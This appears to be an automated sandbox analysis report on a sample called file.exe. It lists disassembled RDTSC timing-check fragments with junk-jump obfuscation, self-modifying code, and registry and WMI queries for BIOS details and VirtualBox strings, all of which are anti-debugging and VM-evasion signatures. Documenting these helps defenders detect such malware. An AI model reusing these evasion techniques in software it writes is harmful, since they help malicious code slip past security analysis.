            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0205 second address: 4DB024D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D50449AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F45D50449B1h 0x00000016 adc cl, FFFFFFF6h 0x00000019 jmp 00007F45D50449B1h 0x0000001e popfd 0x0000001f mov ax, 3BE7h 0x00000023 popad 0x00000024 pop eax 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB024D second address: 4DB0253 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0253 second address: 4DB0259 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0259 second address: 4DB025D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB025D second address: 4DB02DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D50449B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr fs:[00000000h] 0x00000011 jmp 00007F45D50449B0h 0x00000016 nop 0x00000017 pushad 0x00000018 mov cx, 4FFDh 0x0000001c mov edi, ecx 0x0000001e popad 0x0000001f push eax 0x00000020 jmp 00007F45D50449AFh 0x00000025 nop 0x00000026 jmp 00007F45D50449B6h 0x0000002b sub esp, 18h 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F45D50449B7h 0x00000035 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB02DD second address: 4DB033A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F45D5047A2Fh 0x00000009 xor eax, 53738DAEh 0x0000000f jmp 00007F45D5047A39h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push ebx 0x00000019 jmp 00007F45D5047A2Ah 0x0000001e mov dword ptr [esp], ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F45D5047A37h 0x00000028 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB033A second address: 4DB0352 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45D50449B4h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0352 second address: 4DB038D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D5047A2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ah, dl 0x00000011 pushfd 0x00000012 jmp 00007F45D5047A2Ch 0x00000017 jmp 00007F45D5047A35h 0x0000001c popfd 0x0000001d popad 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB038D second address: 4DB0393 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0393 second address: 4DB0397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0397 second address: 4DB03EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F45D50449B6h 0x0000000e xchg eax, esi 0x0000000f jmp 00007F45D50449B0h 0x00000014 xchg eax, edi 0x00000015 jmp 00007F45D50449B0h 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F45D50449ADh 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB03EA second address: 4DB03F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB03F0 second address: 4DB0407 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45D50449B3h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0407 second address: 4DB040B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB040B second address: 4DB0419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0419 second address: 4DB0468 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F45D5047A37h 0x00000008 and si, 295Eh 0x0000000d jmp 00007F45D5047A39h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov dh, al 0x00000017 popad 0x00000018 mov eax, dword ptr [770E4538h] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 movzx ecx, di 0x00000023 mov edx, 4782BF04h 0x00000028 popad 0x00000029 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0468 second address: 4DB04B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D50449AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [ebp-08h], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F45D50449AEh 0x00000013 adc esi, 7475AFB8h 0x00000019 jmp 00007F45D50449ABh 0x0000001e popfd 0x0000001f push eax 0x00000020 mov ebx, 1EBB6BDAh 0x00000025 pop edx 0x00000026 popad 0x00000027 xor eax, ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F45D50449AAh 0x00000030 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB04B1 second address: 4DB055D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D5047A2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F45D5047A34h 0x00000011 sbb ah, 00000078h 0x00000014 jmp 00007F45D5047A2Bh 0x00000019 popfd 0x0000001a pushfd 0x0000001b jmp 00007F45D5047A38h 0x00000020 or ax, EED8h 0x00000025 jmp 00007F45D5047A2Bh 0x0000002a popfd 0x0000002b popad 0x0000002c push eax 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007F45D5047A2Fh 0x00000034 adc cx, 199Eh 0x00000039 jmp 00007F45D5047A39h 0x0000003e popfd 0x0000003f jmp 00007F45D5047A30h 0x00000044 popad 0x00000045 nop 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 mov ch, dh 0x0000004b movzx esi, di 0x0000004e popad 0x0000004f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB055D second address: 4DB0652 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F45D50449AEh 0x00000008 jmp 00007F45D50449B2h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 lea eax, dword ptr [ebp-10h] 0x00000013 jmp 00007F45D50449B0h 0x00000018 mov dword ptr fs:[00000000h], eax 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F45D50449AEh 0x00000025 jmp 00007F45D50449B5h 0x0000002a popfd 0x0000002b mov edi, eax 0x0000002d popad 0x0000002e mov dword ptr [ebp-18h], esp 0x00000031 jmp 00007F45D50449AAh 0x00000036 mov eax, dword ptr fs:[00000018h] 0x0000003c jmp 00007F45D50449B0h 0x00000041 mov ecx, dword ptr [eax+00000FDCh] 0x00000047 pushad 0x00000048 mov edi, esi 0x0000004a mov si, EFA9h 0x0000004e popad 0x0000004f test ecx, ecx 0x00000051 pushad 0x00000052 mov ch, EAh 0x00000054 mov ebx, 38F3D692h 0x00000059 popad 0x0000005a jns 00007F45D50449E1h 0x00000060 pushad 0x00000061 mov ah, bl 0x00000063 pushfd 0x00000064 jmp 00007F45D50449B0h 0x00000069 jmp 00007F45D50449B5h 0x0000006e popfd 0x0000006f popad 0x00000070 add eax, ecx 0x00000072 jmp 00007F45D50449AEh 0x00000077 mov ecx, dword ptr [ebp+08h] 0x0000007a push eax 0x0000007b push edx 0x0000007c pushad 0x0000007d mov bx, F920h 0x00000081 mov ebx, 6D3B874Ch 0x00000086 popad 0x00000087 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0102 second address: 4DA0108 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0108 second address: 4DA0147 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D50449B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007F45D50449B6h 0x00000011 xchg eax, edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F45D50449AAh 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0147 second address: 4DA0156 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D5047A2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA02BA second address: 4DA0337 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007F45D50449ADh 0x0000000b or eax, 4569E4E6h 0x00000011 jmp 00007F45D50449B1h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a nop 0x0000001b jmp 00007F45D50449AEh 0x00000020 push eax 0x00000021 pushad 0x00000022 push edi 0x00000023 pushad 0x00000024 popad 0x00000025 pop eax 0x00000026 pushad 0x00000027 call 00007F45D50449B9h 0x0000002c pop eax 0x0000002d mov si, dx 0x00000030 popad 0x00000031 popad 0x00000032 nop 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F45D50449B5h 0x0000003c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0337 second address: 4DA034C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D5047A31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0381 second address: 4DA0387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0387 second address: 4DA038B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA038B second address: 4DA03C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F4647332A9Fh 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F45D50449B1h 0x00000017 xor cx, 2D26h 0x0000001c jmp 00007F45D50449B1h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA03C6 second address: 4DA03CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA03CC second address: 4DA03D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA03D0 second address: 4DA03D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA03D4 second address: 4DA03E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F45D5044A41h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA03E7 second address: 4DA040D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F45D5047A2Eh 0x0000000a and eax, 495579F8h 0x00000010 jmp 00007F45D5047A2Bh 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA040D second address: 4DA046C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D50449B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-14h], edi 0x0000000c jmp 00007F45D50449AEh 0x00000011 jne 00007F4647332A06h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F45D50449ADh 0x00000020 add si, 1FF6h 0x00000025 jmp 00007F45D50449B1h 0x0000002a popfd 0x0000002b mov edx, eax 0x0000002d popad 0x0000002e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA046C second address: 4DA04AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D5047A2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+08h] 0x0000000c jmp 00007F45D5047A2Eh 0x00000011 lea eax, dword ptr [ebp-2Ch] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F45D5047A37h 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA04AA second address: 4DA04B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA04B0 second address: 4DA04B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA04B4 second address: 4DA04E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a jmp 00007F45D50449AAh 0x0000000f mov ax, 3531h 0x00000013 popad 0x00000014 mov dword ptr [esp], esi 0x00000017 jmp 00007F45D50449ACh 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA04E3 second address: 4DA04E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA04E7 second address: 4DA0504 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D50449B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA05E0 second address: 4DA05E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA05E6 second address: 4DA05EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA05EA second address: 4DA061C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D5047A33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F45D5047A35h 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA061C second address: 4D90D80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F45D50449B7h 0x00000009 and esi, 380D90FEh 0x0000000f jmp 00007F45D50449B9h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 je 00007F46473329A1h 0x0000001e xor eax, eax 0x00000020 jmp 00007F45D501E0DAh 0x00000025 pop esi 0x00000026 pop edi 0x00000027 pop ebx 0x00000028 leave 0x00000029 retn 0004h 0x0000002c nop 0x0000002d cmp eax, 00000000h 0x00000030 setne cl 0x00000033 xor ebx, ebx 0x00000035 test cl, 00000001h 0x00000038 jne 00007F45D50449A7h 0x0000003a jmp 00007F45D5044ACAh 0x0000003f call 00007F45D9A71887h 0x00000044 mov edi, edi 0x00000046 jmp 00007F45D50449B3h 0x0000004b xchg eax, ebp 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007F45D50449B5h 0x00000053 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90D80 second address: 4D90E26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D5047A31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F45D5047A31h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 push eax 0x00000012 pushfd 0x00000013 jmp 00007F45D5047A33h 0x00000018 and ch, FFFFFFFEh 0x0000001b jmp 00007F45D5047A39h 0x00000020 popfd 0x00000021 pop ecx 0x00000022 mov edx, 6CF60374h 0x00000027 popad 0x00000028 mov ebp, esp 0x0000002a pushad 0x0000002b mov edx, 6CFA4D0Ch 0x00000030 jmp 00007F45D5047A35h 0x00000035 popad 0x00000036 xchg eax, ecx 0x00000037 pushad 0x00000038 mov dx, ax 0x0000003b mov cx, 9A1Fh 0x0000003f popad 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F45D5047A37h 0x0000004a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90E26 second address: 4D90E2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90E2A second address: 4D90E30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0C58 second address: 4DA0C5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0C5E second address: 4DA0CB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D5047A35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jmp 00007F45D5047A2Eh 0x0000000f call 00007F464732C912h 0x00000014 push 77082B70h 0x00000019 push dword ptr fs:[00000000h] 0x00000020 mov eax, dword ptr [esp+10h] 0x00000024 mov dword ptr [esp+10h], ebp 0x00000028 lea ebp, dword ptr [esp+10h] 0x0000002c sub esp, eax 0x0000002e push ebx 0x0000002f push esi 0x00000030 push edi 0x00000031 mov eax, dword ptr [770E4538h] 0x00000036 xor dword ptr [ebp-04h], eax 0x00000039 xor eax, ebp 0x0000003b push eax 0x0000003c mov dword ptr [ebp-18h], esp 0x0000003f push dword ptr [ebp-08h] 0x00000042 mov eax, dword ptr [ebp-04h] 0x00000045 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000004c mov dword ptr [ebp-08h], eax 0x0000004f lea eax, dword ptr [ebp-10h] 0x00000052 mov dword ptr fs:[00000000h], eax 0x00000058 ret 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c mov cl, dl 0x0000005e pushfd 0x0000005f jmp 00007F45D5047A36h 0x00000064 sbb ax, 5498h 0x00000069 jmp 00007F45D5047A2Bh 0x0000006e popfd 0x0000006f popad 0x00000070 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0CB9 second address: 4DA0D09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D50449B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esi, esi 0x0000000b jmp 00007F45D50449B7h 0x00000010 mov dword ptr [ebp-1Ch], esi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F45D50449B5h 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB09AA second address: 4DB09B9 instructions: 0x00000000 rdtsc 0x00000002 mov dx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB09B9 second address: 4DB09BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB09BD second address: 4DB09C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB09C3 second address: 4DB0A05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F45D50449AEh 0x00000008 pop eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F45D50449AEh 0x00000014 or ch, 00000038h 0x00000017 jmp 00007F45D50449ABh 0x0000001c popfd 0x0000001d mov esi, 6ADD7F6Fh 0x00000022 popad 0x00000023 xchg eax, ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0A05 second address: 4DB0A09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0A09 second address: 4DB0A0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0A0F second address: 4DB0AB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 857Bh 0x00000007 mov dh, ch 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F45D5047A39h 0x00000015 xor si, FD36h 0x0000001a jmp 00007F45D5047A31h 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007F45D5047A30h 0x00000026 sbb ah, 00000058h 0x00000029 jmp 00007F45D5047A2Bh 0x0000002e popfd 0x0000002f popad 0x00000030 xchg eax, esi 0x00000031 jmp 00007F45D5047A36h 0x00000036 push eax 0x00000037 jmp 00007F45D5047A2Bh 0x0000003c xchg eax, esi 0x0000003d jmp 00007F45D5047A36h 0x00000042 mov esi, dword ptr [ebp+0Ch] 0x00000045 pushad 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0AB1 second address: 4DB0B15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, CBA9h 0x00000008 popad 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F45D50449B4h 0x00000010 add cl, 00000078h 0x00000013 jmp 00007F45D50449ABh 0x00000018 popfd 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c popad 0x0000001d test esi, esi 0x0000001f pushad 0x00000020 movzx ecx, dx 0x00000023 popad 0x00000024 je 00007F4647312273h 0x0000002a jmp 00007F45D50449B8h 0x0000002f cmp dword ptr [770E459Ch], 05h 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b popad 0x0000003c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0B15 second address: 4DB0B32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D5047A39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0B32 second address: 4DB0B8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F45D50449B7h 0x00000009 sbb cx, 3AAEh 0x0000000e jmp 00007F45D50449B9h 0x00000013 popfd 0x00000014 mov cx, E337h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b je 00007F464732A2CAh 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 call 00007F45D50449AFh 0x00000029 pop ecx 0x0000002a pushad 0x0000002b popad 0x0000002c popad 0x0000002d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0B8F second address: 4DB0B9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45D5047A2Bh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0B9E second address: 4DB0BE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D50449B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d mov di, cx 0x00000010 movzx esi, bx 0x00000013 popad 0x00000014 push eax 0x00000015 pushad 0x00000016 push ecx 0x00000017 movsx ebx, si 0x0000001a pop eax 0x0000001b mov di, 592Ch 0x0000001f popad 0x00000020 xchg eax, esi 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F45D50449AEh 0x00000028 rdtsc
            Tries to evade debugger and weak emulator (self modifying code)
            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 52BFCA instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
            Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
            Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
            Source: C:\Users\user\Desktop\file.exe TID: 7908Thread sleep time: -150000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\file.exe TID: 7908Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: file.exe, file.exe, 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
